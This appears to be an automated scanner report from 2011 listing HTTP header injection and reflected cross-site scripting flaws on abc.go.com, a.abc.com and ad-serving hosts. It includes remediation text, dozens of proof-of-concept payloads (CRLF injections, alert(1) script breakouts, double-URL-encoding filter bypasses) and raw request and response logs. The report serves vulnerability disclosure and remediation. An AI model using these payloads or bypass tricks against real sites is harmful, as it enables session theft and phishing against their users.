HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the crtp request parameter is copied into the X-FW-Error-Info response header. The payload 409f0%0d%0a5b4a6ad39e3 was submitted in the crtp parameter. This caused a response containing an injected HTTP header.
The value of the pvrn request parameter is copied into the Set-Cookie response header. The payload d0907%0d%0a2a6cd9637fb was submitted in the pvrn parameter. This caused a response containing an injected HTTP header.
The value of the cr request parameter is copied into the Location response header. The payload 88a05%0d%0af80ac945c86 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of the code request parameter is copied into the Location response header. The payload 1fa47%0d%0af0b477bcb63 was submitted in the code parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 2 is copied into the Location response header. The payload ec08b%0d%0a7aef034c3c1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the asid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73b8"%3balert(1)//709e783100b was submitted in the asid parameter. This input was echoed as c73b8";alert(1)//709e783100b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the caid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e823d"%3balert(1)//fb691e1ccbe was submitted in the caid parameter. This input was echoed as e823d";alert(1)//fb691e1ccbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the csid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2e94"%3balert(1)//153f43ad13b was submitted in the csid parameter. This input was echoed as b2e94";alert(1)//153f43ad13b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pvrn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d153"%3balert(1)//aad410652c8 was submitted in the pvrn parameter. This input was echoed as 5d153";alert(1)//aad410652c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
(function(){ var pht = !!(''); var psd = window._fw_link_tag_scan_delay || 1*''; var mkv = !(''); if (isNaN(psd)) psd = 0; var am = function(f) { try { return f._fw_admanager && (f._fw_admanager.load ...[SNIP]... setTimeout(f, 10); setTimeout(d, 15000); }; window._fw_slot_urls = []; var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=fox_home&sfid=&cdid=&pvrn=4387245d153";alert(1)//aad410652c8&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1&envp=g_js&w=172&h=235&lo="; if (document.addEventListener) { document.addEventListener( "DOMContentLoaded", e, false ); do ...[SNIP]...
The value of the slid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea261"%3balert(1)//192f5f5f8da was submitted in the slid parameter. This input was echoed as ea261";alert(1)//192f5f5f8da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
(function(){ var pht = !!(''); var psd = window._fw_link_tag_scan_delay || 1*''; var mkv = !(''); if (isNaN(psd)) psd = 0; var am = function(f) { try { return f._fw_admanager && (f._fw_admanager.load ...[SNIP]... ; var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=fox_home&sfid=&cdid=&pvrn=438724&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1ea261";alert(1)//192f5f5f8da&envp=g_js&w=172&h=235&lo="; if (document.addEventListener) { document.addEventListener( "DOMContentLoaded", e, false ); document.addEventListener( "load", e, false ); } else if (window.attachEve ...[SNIP]...
The value of the slid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e863b'%3balert(1)//2cbc42ff0ae was submitted in the slid parameter. This input was echoed as e863b';alert(1)//2cbc42ff0ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ssid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86690"%3balert(1)//516bfa20066 was submitted in the ssid parameter. This input was echoed as 86690";alert(1)//516bfa20066 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the vprn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed988"%3balert(1)//c4cc2308232 was submitted in the vprn parameter. This input was echoed as ed988";alert(1)//c4cc2308232 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29e93%253cscript%253ealert%25281%2529%253c%252fscript%253ec860dc188c0 was submitted in the REST URL parameter 5. This input was echoed as 29e93<script>alert(1)</script>c860dc188c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/css/files/csar-ad,slideshow,carousellist,full-episode-carousel-list,video-clips-list,list,join,featured,poll.css29e93%253cscript%253ealert%25281%2529%253c%252fscript%253ec860dc188c0?cb=v5.96 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://abc.go.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 24829 Content-Type: text/css Last-Modified: Sun, 02 Oct 2011 22:58:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed10 X-Powered-By: ASP.NET Cache-Expires: Sun, 02 Oct 2011 23:58:22 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=300 Date: Sun, 02 Oct 2011 22:58:23 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1f02d%253cscript%253ealert%25281%2529%253c%252fscript%253e528beb3d46c was submitted in the REST URL parameter 5. This input was echoed as 1f02d<script>alert(1)</script>528beb3d46c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/css/files/home-page,generic,featured-start.css1f02d%253cscript%253ealert%25281%2529%253c%252fscript%253e528beb3d46c?cb=v5.96 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://abc.go.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 10892 Content-Type: text/css Last-Modified: Sun, 02 Oct 2011 22:58:22 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed02 X-Powered-By: ASP.NET Cache-Expires: Sun, 02 Oct 2011 23:58:22 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=300 Date: Sun, 02 Oct 2011 22:58:23 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bdd50%253cscript%253ealert%25281%2529%253c%252fscript%253e0db0440f260 was submitted in the REST URL parameter 5. This input was echoed as bdd50<script>alert(1)</script>0db0440f260 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/css/files/reset,style,global,register-loader,social-link,textmessage,upgrade,abc-community,share-global,facebooklike.cssbdd50%253cscript%253ealert%25281%2529%253c%252fscript%253e0db0440f260?cb=v5.96 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://abc.go.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 32879 Content-Type: text/css Last-Modified: Sun, 02 Oct 2011 22:58:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed07 X-Powered-By: ASP.NET Cache-Expires: Sun, 02 Oct 2011 23:58:26 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=300 Date: Sun, 02 Oct 2011 22:58:26 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload 85104%252a%252falert%25281%2529%252f%252f1219963b799 was submitted in the REST URL parameter 5. This input was echoed as 85104*/alert(1)//1219963b799 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/abchomepage,sfplayer,feplayer,breakingnews,browsercheck,featured-start.js85104%252a%252falert%25281%2529%252f%252f1219963b799?cb=v5.96 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://abc.go.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 9679 Content-Type: text/javascript Last-Modified: Sun, 02 Oct 2011 22:58:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed05 X-Powered-By: ASP.NET Cache-Expires: Sun, 02 Oct 2011 23:58:24 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=293 Date: Sun, 02 Oct 2011 22:58:24 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload 2e5e6%252a%252falert%25281%2529%252f%252f76f80514488 was submitted in the REST URL parameter 5. This input was echoed as 2e5e6*/alert(1)//76f80514488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/jquery,ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js2e5e6%252a%252falert%25281%2529%252f%252f76f80514488?cb=v5.96 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://abc.go.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 217378 Content-Type: text/javascript Last-Modified: Sun, 02 Oct 2011 22:58:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed09 X-Powered-By: ASP.NET Cache-Expires: Sun, 02 Oct 2011 23:58:34 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=300 Date: Sun, 02 Oct 2011 22:58:35 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9fed7%253cscript%253ealert%25281%2529%253c%252fscript%253edf41d8fefd8 was submitted in the REST URL parameter 5. This input was echoed as 9fed7<script>alert(1)</script>df41d8fefd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/utils-easing,itemSlider,slideshow,logger,carousellist,join,jquery-cycle-all,featured,form,validate,poll.js9fed7%253cscript%253ealert%25281%2529%253c%252fscript%253edf41d8fefd8?cb=v5.96 HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://abc.go.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 88703 Content-Type: text/javascript Last-Modified: Sun, 02 Oct 2011 22:58:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed10 X-Powered-By: ASP.NET Cache-Expires: Sun, 02 Oct 2011 23:58:32 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=284 Date: Sun, 02 Oct 2011 22:58:33 GMT Connection: close
2.15. http://abc.go.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://abc.go.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7acb4"%3balert(1)//63f7b085878 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7acb4";alert(1)//63f7b085878 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=900 Content-Length: 87269 Content-Type: text/html; charset=UTF-8 Last-Modified: Sun, 02 Oct 2011 22:58:56 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc01 X-Powered-By: ASP.NET Cache-Expires: Sun, 02 Oct 2011 23:01:56 GMT Date: Sun, 02 Oct 2011 22:58:56 GMT Vary: Accept-Encoding Connection: Keep-Alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... bc.csar.go.com/DynamicCSAd?srvc=abc&itype=ThinBanner&itype=Rectangles&itype=Background&itype=LRGutters&itype=PopUnder&itype=Survey&itype=FPBranding&itype=Banner-Unicast&itype=RevenueScience&url=/index?7acb4";alert(1)//63f7b085878=1"; var paramD = "&"; var regexS = "[\?&]test=([^&#]*)"; var regex = new RegExp( regexS ); var resultsT = regex.exec( window.location.href ); if(resultsT != null) csarUrl += paramD + "test="+ resul ...[SNIP]...
The value of the requestId request parameter is copied into the HTML document as plain text between tags. The payload 66ef5<script>alert(1)</script>d34c2adb418 was submitted in the requestId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cecda<script>alert(1)</script>8fe0763fb0b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the u request parameter is copied into the HTML document as plain text between tags. The payload 3cc2f<script>alert(1)</script>6f59c4c5e7b was submitted in the u parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5adf9'-alert(1)-'e703109e196 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Sun, 02 Oct 2011 22:52:41 GMT Content-Length: 697
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb91a'-alert(1)-'1af8fb6eb1c was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Sun, 02 Oct 2011 22:52:55 GMT Content-Length: 697
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 51f23<script>alert(1)</script>3d1eaa1fce was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 22:51:38 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2509
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "211776751f23<script>alert(1)</script>3d1eaa1fce"
The value of the placementId request parameter is copied into an HTML comment. The payload 3c709--><script>alert(1)</script>f681079bcf was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 22:51:28 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3306 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "15009293c709--><script>alert(1)</script>f681079bcf" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 239e4--><script>alert(1)</script>ff78946a10b was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 22:51:50 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3748 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1239e4--><script>alert(1)</script>ff78946a10b" -->
The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66f79'%3balert(1)//f482c983bae was submitted in the flash parameter. This input was echoed as 66f79';alert(1)//f482c983bae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b326'-alert(1)-'ad2160818d9 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 495cf'%3balert(1)//72dae9d4c18 was submitted in the time parameter. This input was echoed as 495cf';alert(1)//72dae9d4c18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eceb9"%3balert(1)//8e5bf6d142d was submitted in the type parameter. This input was echoed as eceb9";alert(1)//8e5bf6d142d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 21b7c<script>alert(1)</script>2b8e828c0be was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bf7b0<script>alert(1)</script>b73cb9f2da3 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f8dca<script>alert(1)</script>638a85fbe05 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 7b374<script>alert(1)</script>a269ac575a9 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload b7d3d<script>alert(1)</script>c39da1e82c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ef225<script>alert(1)</script>616bae54eeb was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the site request parameter is copied into the HTML document as plain text between tags. The payload 43357<script>alert(1)</script>fb7066d837f was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
